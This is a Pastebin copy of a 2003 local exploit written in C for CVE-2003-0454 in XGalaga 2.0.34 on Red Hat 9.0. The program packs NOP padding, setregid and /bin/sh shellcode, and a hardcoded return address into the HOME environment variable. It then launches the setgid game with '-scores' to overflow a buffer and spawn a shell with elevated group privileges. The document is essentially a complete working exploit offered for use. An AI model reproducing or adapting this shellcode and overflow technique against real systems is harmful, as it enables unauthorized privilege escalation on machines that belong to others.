Advertisement
FlyFar

XGalaga 2.0.34 (RedHat 9.0) - Local Game - CVE-2003-0454

Feb 5th, 2024
869
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.50 KB | Cybersecurity | 0 0
  1. /* 0x333xgalaga => XGalaga 2.0.34 local game exploit (Red Hat 9.0)
  2. *
  3. * tested against xgalaga-2.0.34-1.i386.rpm
  4. * under Red Hat Linux 9.0
  5. *
  6. * - bug found by Steve Kemp
  7. * - exploit coded by c0wboy @ 0x333
  8. *
  9. * (c) 0x333 Outsider Security Labs / www.0x333.org
  10. *
  11. */
  12.  
  13.  
  14. #include <stdio.h>
  15. #include <string.h>
  16. #include <unistd.h>
  17.  
  18.  
  19. #define BIN "/usr/X11R6/bin/xgalaga"
  20. #define SIZE 264
  21.  
  22. #define RET 0xbffffe2c /* tested against Red Hat Linux 9.0 */
  23. #define NOP 0x90
  24.  
  25.  
  26. unsigned char shellcode[] =
  27.  
  28. /* setregid (20,20) shellcode */
  29. "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
  30. "\xcd\x80"
  31.  
  32. /* exec /bin/sh shellcode */
  33.  
  34. "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
  35. "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
  36.  
  37.  
  38. void banner (void);
  39. void memret (char *, int, int, int);
  40.  
  41.  
  42. void banner (void)
  43. {
  44. fprintf (stdout, "\n\n --- xgalaga local GAME exploit by c0wboy ---\n");
  45. fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n");
  46. }
  47.  
  48.  
  49. void memret (char *buffer, int ret, int size, int align)
  50. {
  51. int i;
  52. int * ptr = (int *) (buffer + align);
  53.  
  54. for (i=0; i<size; i+=4)
  55. *ptr++ = ret;
  56.  
  57. ptr = 0x0;
  58. }
  59.  
  60.  
  61. int main ()
  62. {
  63. int ret = RET;
  64. char out[SIZE];
  65.  
  66. memret ((char *)out, ret, SIZE-1, 0);
  67.  
  68. memset ((char *)out, NOP, 33);
  69. memcpy ((char *)out+33, shellcode, strlen(shellcode));
  70.  
  71. setenv ("HOME", out, 1);
  72.  
  73. banner ();
  74. execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game
  75. }
  76.  
  77. // milw0rm.com [2003-07-31]
  78.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement